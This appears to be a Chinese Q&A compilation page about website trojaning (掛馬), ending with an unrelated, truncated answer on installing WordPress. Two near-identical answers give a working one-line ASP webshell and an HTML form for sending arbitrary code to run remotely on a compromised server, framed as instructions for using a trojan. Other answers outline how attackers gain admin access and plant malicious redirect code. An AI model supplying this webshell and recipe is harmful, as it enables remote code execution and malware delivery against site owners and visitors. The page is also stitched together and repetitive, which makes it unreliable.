1、 wordpress 掛馬,什么是網(wǎng)頁(yè)掛馬?
網(wǎng)頁(yè)掛馬是指通過(guò)網(wǎng)站漏洞入侵并修改相關(guān)網(wǎng)頁(yè)相關(guān)代碼,比如在用戶常瀏覽的頁(yè)面插入惡意的js代碼,或者經(jīng)典的flash漏洞文件,這樣在其他人瀏覽被掛馬網(wǎng)頁(yè)的時(shí)候就會(huì)被執(zhí)行惡意代碼并下載相關(guān)的木馬文件到用戶電腦里面去,以前很多用戶明明沒(méi)有運(yùn)行可疑文件,卻中木馬了,多數(shù)就是因?yàn)闉g覽了被掛馬的網(wǎng)頁(yè)導(dǎo)致的。
2、 怎樣用木馬?
一句話木馬就是在asp文件插入類似于這樣的代碼"<%execute request("nneeenn")%>"execute函數(shù)允許執(zhí)行任意asp代碼在客戶端寫(xiě)一個(gè)表單<form action="你掛馬的頁(yè)面" method="post"><input type="text" name="nneeenn" value=""><%--!此處的nneenn和<%execute request("nneeenn")%>中的nneeenn必須一致--%><input type="submit" value="發(fā)送"></form>把上面的代碼保存成mm.html打開(kāi)在里面輸入你要執(zhí)行的asp代碼點(diǎn)擊發(fā)送這時(shí) 你寫(xiě)的asp 代碼就在遠(yuǎn)程執(zhí)行了而那個(gè)asp代碼可以是個(gè)小木馬
3、 木馬怎么用?
一句話木馬就是在asp文件插入類似于這樣的代碼"<%executerequest("nneeenn")%>"execute函數(shù)允許執(zhí)行任意asp代碼
在客戶端寫(xiě)一個(gè)表單
<formaction="你掛馬的頁(yè)面"method="post">
<inputtype="text"name="nneeenn"value=""><%--!此處的nneenn和<%executerequest("nneeenn")%>中的nneeenn必須一致--%>
<inputtype="submit"value="發(fā)送">
</form>
把上面的代碼保存成mm.html
打開(kāi)
在里面輸入你要執(zhí)行的asp代碼
點(diǎn)擊發(fā)送
這時(shí)你寫(xiě)的asp代碼就在遠(yuǎn)程執(zhí)行了
而那個(gè)asp代碼可以是個(gè)小木馬
4、 掛馬是什么?
所謂的掛馬,就是黑客通過(guò)各種手段,包括SQL注入,網(wǎng)站敏感文件掃描,服務(wù)器漏洞,網(wǎng)站程序0day, 等各種方法獲得網(wǎng)站管理員賬號(hào),然后登陸網(wǎng)站后臺(tái),通過(guò)數(shù)據(jù)庫(kù)“備份/恢復(fù)”或者上傳漏洞獲得一個(gè)webshell。
利用獲得的webshell修改網(wǎng)站頁(yè)面的內(nèi)容,向頁(yè)面中加入惡意轉(zhuǎn)向代碼。
也可以直接通過(guò)弱口令獲得服務(wù)器或者網(wǎng)站FTP,然后直接對(duì)網(wǎng)站頁(yè)面直接進(jìn)行修改。
當(dāng)你訪問(wèn)被加入惡意代碼的頁(yè)面時(shí),你就會(huì)自動(dòng)的訪問(wèn)被轉(zhuǎn)向的地址或者下載木馬病毒。
5、 如何快速搭建Wordpress網(wǎng)站?
首先,WordPress是一個(gè)開(kāi)源的網(wǎng)站博客程序。
您可以去它的官網(wǎng)(cn.wordpress.org)上,下載安裝包到您的虛擬主機(jī)上進(jìn)行安裝。
以下為安裝步驟的圖片,請(qǐng)您收下。